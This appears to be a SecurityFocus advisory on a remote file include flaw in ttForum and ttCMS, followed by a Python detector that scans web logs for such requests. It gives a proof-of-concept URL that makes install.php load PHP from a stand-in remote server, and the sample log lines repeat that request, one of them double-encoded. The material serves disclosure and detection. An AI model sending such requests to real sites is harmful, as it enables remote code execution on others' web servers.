source: https://www.securityfocus.com/bid/7542/info

A remote file include vulnerability has been reported for both ttForum and ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'News.php' and 'Install.php' scripts, it is possible for a remote attacker to include a malicious PHP file in a URL.

Successful exploitation will result in the execution of the attacker-supplied PHP instructions with the privileges of the web server.

There are conflicting reports about whether or not this issue exists. The vendor has stated that exploitation of this issue is not possible.

http://www.example.com/install.php?step=7&installdir=http://yourserver/Settings.php
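The request pattern above can be looked for in web server access logs. The following is an added example, not part of the original advisory or of ttForum/ttCMS: a heuristic that flags requests to the two scripts named in the advisory when any query parameter carries a remote URL. The function names, the combined log format and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Scripts named in the advisory; compared case-insensitively on the last path segment.
WATCHED_SCRIPTS = {"news.php", "install.php"}
# A value that starts with a URL scheme points the script at a remote resource.
REMOTE_VALUE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)
# Request line inside a combined-format access log entry (assumed log format).
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def remote_include_params(log_line):
    """Return [(param, value)] for query parameters carrying a remote URL."""
    m = REQUEST_LINE.search(log_line)
    if not m:
        return []
    target = urlsplit(m.group(1))
    script = target.path.rsplit("/", 1)[-1].lower()
    if script not in WATCHED_SCRIPTS:
        return []
    hits = []
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        # parse_qsl decodes once; decode a second time to catch double-encoded values.
        if any(REMOTE_VALUE.match(v) for v in (value, unquote(value))):
            hits.append((name, value))
    return hits


# Constructed sample log lines (documentation addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/May/2003:10:00:00 +0000] "GET /install.php?step=7&installdir=http://yourserver/Settings.php HTTP/1.0" 200 512',
    '192.0.2.11 - - [10/May/2003:10:00:05 +0000] "GET /install.php?step=7&installdir=%2568ttp%253A%252F%252Fyourserver%252FSettings.php HTTP/1.0" 200 512',
    '192.0.2.12 - - [10/May/2003:10:00:09 +0000] "GET /News.php?id=4 HTTP/1.0" 200 2048',
    '192.0.2.13 - - [10/May/2003:10:00:12 +0000] "GET /index.php?ref=http://www.example.com/ HTTP/1.0" 200 100',
]


def scan(lines):
    """Map line index -> suspicious parameters, for lines that have any."""
    return {i: h for i, line in enumerate(lines) if (h := remote_include_params(line))}


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, hits)
```

A hit shows that a request of this shape was received, not that the include succeeded; the advisory itself notes that exploitability is disputed.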